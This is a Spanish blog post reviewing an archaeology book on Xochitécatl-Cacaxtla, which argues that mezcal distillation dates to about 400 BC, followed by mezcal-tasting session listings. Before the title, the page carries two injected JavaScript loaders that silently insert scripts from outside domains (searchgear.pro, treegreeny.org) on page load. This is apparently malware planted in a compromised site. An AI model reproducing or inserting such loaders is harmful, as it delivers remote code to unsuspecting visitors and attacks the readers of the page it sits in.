;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 102. El mezcal en Xochitécatl-Cacaxtla

102. El mezcal en Xochitécatl-Cacaxtla


Recibí como obsequio de la Dra. Mari Carmen Serra Puche el hermoso libro Vida cotidiana. Xochitécatl-Cacaxtla, días, años, milenios, vol. I, editado por la UNAM /Instituto de Investigaciones Antropológicas en junio de 2011. Ella y el Maestro Jesús Carlos Lazcano Arce comparten la autoría, y es el resultado de las excavaciones realizadas en las temporadas anuales entre 1996 y 2008.
Con un cómodo formato tamaño carta, exquisitas ilustraciones y tipografía legible por cualquier mortal, el texto consta de 12 capítulos, un anexo y bibliografía. Algunos de los primeros son: III El medio natural; V Patrón de asentamiento; VI El tiempo; VII La vida cotidiana durante el Formativo; VIII La vida cotidiana durante el Epiclásico; XI Identidad étnica. Pese a ser un libro especializado en arqueología, su lenguaje es accesible y ameno, aunque sí requiere un mínimo conocimiento de esta ciencia y de las que le sirven de ciencias auxiliares.
En el capítulo VII encontramos el apartado “Las casas de los mezcaleros” (p. 75-86), donde se dice que la “investigación establece que el proceso de destilación del mezcal sigue presente en diversas comunidades indígenas actuales (nahua, huichola, cora, zapoteca, mixe, mixteca, mazateca, entre otras). Por lo tanto, nos parece verosímil que también lo hayan conocido las prehispánicas.” Más adelante, los autores afirman: “Si bien es cierto que aún falta correlacionar los resultados de los análisis y las evidencias del proceso de destilación –a la luz de las evidencias arqueológicas, etnohistóricas, etnológicas y químicas- poca duda cabe de que la producción del mezcal se remonta a 400 a. C”, fecha correspondiente al período Formativo Tardío (400 a.C.-200 d.C).
Quien desee saborear mezcales tradicionales acuda a las sesiones de la Logia de los Mezcólatras a las 20 horas en la Ciudad de México: martes 22 en SINESTESIA, San Luis Potosí 121, altos, col. Roma; miércoles 23 en Al Andar (Regina 27-A, Centro Histórico) y en El Convento (Fernández Leal 96, Coyoacán).

http://impreso.milenio.com/node/9064899

Category: Milenio, Publicaciones

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *